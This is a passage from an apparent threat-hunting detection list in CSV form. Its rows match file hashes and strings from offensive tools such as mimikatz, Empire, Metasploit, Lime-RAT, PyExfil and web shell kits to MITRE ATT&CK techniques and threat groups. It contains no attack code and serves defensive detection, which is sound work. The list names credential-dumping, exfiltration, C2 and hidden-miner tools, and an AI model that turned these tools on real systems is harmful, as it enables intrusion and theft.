"*9f9619eb96a53d7166f5b853cbfe09c20d13d39e2b81cd14eb05f5240b42cce2*",".{0,1000}9f9619eb96a53d7166f5b853cbfe09c20d13d39e2b81cd14eb05f5240b42cce2.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","32092" "*9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39*",".{0,1000}9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32093" "*9f9b1672144c23acf6b5d94fbb84756253a0dc4240b19ff4b7c5e73e38c2e6e6*",".{0,1000}9f9b1672144c23acf6b5d94fbb84756253a0dc4240b19ff4b7c5e73e38c2e6e6.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","32094" "*9f9b6e450c8c20f087105c41a845937e64401d40e5bdc06dfc38c0c2cfe8e7dd*",".{0,1000}9f9b6e450c8c20f087105c41a845937e64401d40e5bdc06dfc38c0c2cfe8e7dd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32095" 
"*9fa36e9dbce91b0a9e691b8664ecce4953eebf7ce6260f71f5b9accc46694d70*",".{0,1000}9fa36e9dbce91b0a9e691b8664ecce4953eebf7ce6260f71f5b9accc46694d70.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32096" "*9fa4e7fc4ff2efdc1fa89ec084b422fb8b57844a6c155c92a897767e835731ee*",".{0,1000}9fa4e7fc4ff2efdc1fa89ec084b422fb8b57844a6c155c92a897767e835731ee.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32098" "*9fa884564bc924f3a31a3f8820a887dd1c26eef4a07511837d9bcf6843c24d69*",".{0,1000}9fa884564bc924f3a31a3f8820a887dd1c26eef4a07511837d9bcf6843c24d69.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32099" 
"*9fa9202c24ff2eb3dd3dae886831de5799319e7f99ebc1f4a779832539b34560*",".{0,1000}9fa9202c24ff2eb3dd3dae886831de5799319e7f99ebc1f4a779832539b34560.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32101" "*9fb43934f7fab913cd91847ca228bba739f98f58074bcedd50a912a71b313c5c*",".{0,1000}9fb43934f7fab913cd91847ca228bba739f98f58074bcedd50a912a71b313c5c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","32102" "*9fbe53eae88ccff8713e0c14e623352af0a7424e234499e6dfa6cf7455f83ae8*",".{0,1000}9fbe53eae88ccff8713e0c14e623352af0a7424e234499e6dfa6cf7455f83ae8.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32104" "*9fc04e375ecd2d91dff8a0cd64fc10852bdca276699fd6d633b4e5537b7d5c5a*",".{0,1000}9fc04e375ecd2d91dff8a0cd64fc10852bdca276699fd6d633b4e5537b7d5c5a.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","32105" "*9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0*",".{0,1000}9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32107" 
"*9fc6a05224549777e8c241bb0cc5b3bab16974b977ed8d97b515698cb560d34c*",".{0,1000}9fc6a05224549777e8c241bb0cc5b3bab16974b977ed8d97b515698cb560d34c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32110" "*9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d*",".{0,1000}9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32111" "*9fd62a2ee41355f974bf08ef13a49c7007c39f0f088e4f4fefb526ded4de44d9*",".{0,1000}9fd62a2ee41355f974bf08ef13a49c7007c39f0f088e4f4fefb526ded4de44d9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32112" "*9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf*",".{0,1000}9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32113" 
"*9fdebdd052d328f15c841b9616ab0a2344a02e0a2fad25f717a73bf6490018ce*",".{0,1000}9fdebdd052d328f15c841b9616ab0a2344a02e0a2fad25f717a73bf6490018ce.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32114" "*9fe02af5b7e2f22489b42a2c0888731f8be61f296d83ef8d0706c54b30d7c409*",".{0,1000}9fe02af5b7e2f22489b42a2c0888731f8be61f296d83ef8d0706c54b30d7c409.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32115" "*9fe31fab0dab2f646ca5703beb86d5659ddb7bc6f8f20640c0e1c04b10879136*",".{0,1000}9fe31fab0dab2f646ca5703beb86d5659ddb7bc6f8f20640c0e1c04b10879136.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32116" "*9FEA6712-3880-4E5F-BD56-8E58A4EBCCB4*",".{0,1000}9FEA6712\-3880\-4E5F\-BD56\-8E58A4EBCCB4.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 
- TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","32117" "*9FF259F26CA9D841AFD5D6AF5B631F6CB267ED602BC50624830DC47EF743483E*",".{0,1000}9FF259F26CA9D841AFD5D6AF5B631F6CB267ED602BC50624830DC47EF743483E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32119" "*9ff68520e3478d33ab150b7f4db42cbd9d2b9268aad3447a2ba20dd60771547e*",".{0,1000}9ff68520e3478d33ab150b7f4db42cbd9d2b9268aad3447a2ba20dd60771547e.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","32120" "*9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad*",".{0,1000}9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","32121" "*A C# utility for interacting with SCCM (now Microsoft Endpoint Configuration Manager) by Chris Thompson (@_Mayyhem)*",".{0,1000}A\sC\#\sutility\sfor\sinteracting\swith\sSCCM\s\(now\sMicrosoft\sEndpoint\sConfiguration\sManager\)\sby\sChris\sThompson\s\(\@_Mayyhem\).{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","32123" "*A C# utility for interacting with SCCM (now Microsoft Endpoint Configuration Manager) by Chris Thompson (@_Mayyhem)*",".{0,1000}A\sC\#\sutility\sfor\sinteracting\swith\sSCCM\s\(now\sMicrosoft\sEndpoint\sConfiguration\sManager\)\sby\sChris\sThompson\s\(\@_Mayyhem\).{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","32124" "*A cross-platform python based advanced sql injections detection & exploitation tool*",".{0,1000}A\scross\-platform\spython\sbased\sadvanced\ssql\sinjections\sdetection\s\&\sexploitation\stool.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","32126" "*A DNS (over-HTTPS) C2*",".{0,1000}A\sDNS\s\(over\-HTTPS\)\sC2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","32127" "*A fast multi protocol credential bruteforcer/sprayer/enumerator*",".{0,1000}A\sfast\smulti\sprotocol\scredential\sbruteforcer\/sprayer\/enumerator.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","32128" "*A keylogger written in eBPF.*",".{0,1000}A\skeylogger\swritten\sin\seBPF\..{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","32129" "*A La Vie* A L'Amour*",".{0,1000}A\sLa\sVie.{0,1000}\sA\sL\'Amour.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm 
Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32130" "*A new browser has connected to us via WebSocket!*",".{0,1000}A\snew\sbrowser\shas\sconnected\sto\sus\svia\sWebSocket!.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","32132" "*A Python package for data exfiltration.*",".{0,1000}A\sPython\spackage\sfor\sdata\sexfiltration\..{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","32133" "*A ruby http/https proxy to do EVIL things.*",".{0,1000}A\sruby\shttp\/https\sproxy\sto\sdo\sEVIL\sthings\..{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","32134" "*A Silent (Hidden) Free Crypto Miner Builder*",".{0,1000}A\sSilent\s\(Hidden\)\sFree\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - 
TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","32135" "*A Slowloris Attack is Already Running*",".{0,1000}A\sSlowloris\sAttack\sis\sAlready\sRunning.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#content","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32136" "*A UDP Attack is Already Running on *",".{0,1000}A\sUDP\sAttack\sis\sAlready\sRunning\son\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32137" "*a very fast brute force webshell password tool.*",".{0,1000}a\svery\sfast\sbrute\sforce\swebshell\spassword\stool\..{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - 
T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","32142" "*a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4*",".{0,1000}a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32145" "*a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4*",".{0,1000}a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 
- APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32146" "*a0080e0a7da7636d28e71a955f9cfded032fd4311239c2cd35fe78caa8f59abf*",".{0,1000}a0080e0a7da7636d28e71a955f9cfded032fd4311239c2cd35fe78caa8f59abf.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash 